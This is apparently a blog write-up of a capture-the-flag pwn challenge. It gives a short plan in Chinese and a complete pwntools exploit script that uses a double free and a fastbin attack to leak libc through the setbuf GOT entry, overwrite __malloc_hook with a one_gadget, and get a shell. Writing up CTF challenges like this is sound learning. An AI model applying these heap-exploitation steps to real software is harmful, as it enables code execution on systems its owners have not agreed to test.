MENU

*CTF double free & fastbin attack level4-bsschunk Writeup

November 6, 2020 • Read: 350 • Pwn

一道简单的double free + fastbin attack。
思路:
1.利用第一次double free来修改fd为pool数组 - Offset的位置,然后修改pool数组的第一个位置为我们想要读取的位置,达到任意读取的目的。
2.这里我们选择读取setbuf的got表,泄露setbuf的内容,然后利用泄露setbuf的地址来确定libc版本。
3.修改__malloc_hook为one_gadget
4.利用两次free造成异常,报错的时候会调用malloc,malloc->__malooc_hook_one_gadget

from pwn import *
from LibcSearcher import *
#r = process('./heaplevel4-bsschunk')
r = remote("pwn.sixstars.team", 22504)
elf = ELF('./heaplevel4-bsschunk')

def add_note(data):
    r.sendlineafter(">> ", "1")
    r.sendlineafter("Content: ", data)

def show_note(idx):
    r.sendlineafter(">> ", "2")
    r.sendlineafter("id:", str(idx))

def dele_note(idx):
    r.sendlineafter(">> ", "3")
    r.sendlineafter("id:", str(idx))


add_note("a")
add_note("b")
dele_note(0)
dele_note(1)
dele_note(0)
add_note(p64(0x6020C0 - 0x23))
add_note("b")
add_note("a")
add_note('a' * 0x13 + p64(elf.got['setbuf']))

show_note(0)
setbuf_addr = u64(r.recvuntil('\n', drop=True).ljust(8, '\x00'))
libc = LibcSearcher('setbuf', setbuf_addr)
libc_base = setbuf_addr - libc.dump("setbuf")
print hex(libc_base)

add_note("c")
add_note("d")
dele_note(2)
dele_note(3)
dele_note(2)
add_note(p64(libc_base + libc.dump("__malloc_hook") - 0x23))
add_note("b")
add_note("a")
one = [0x45216, 0x4526a, 0xf02a4, 0xf1147]
one_addr = libc_base + one[2]
add_note('a' * 0x13 + p64(one_addr))
dele_note(2)
#gdb.attach(r)
dele_note(2)
r.interactive()

Archives QR Code Tip
QR Code for this page
Tipping QR Code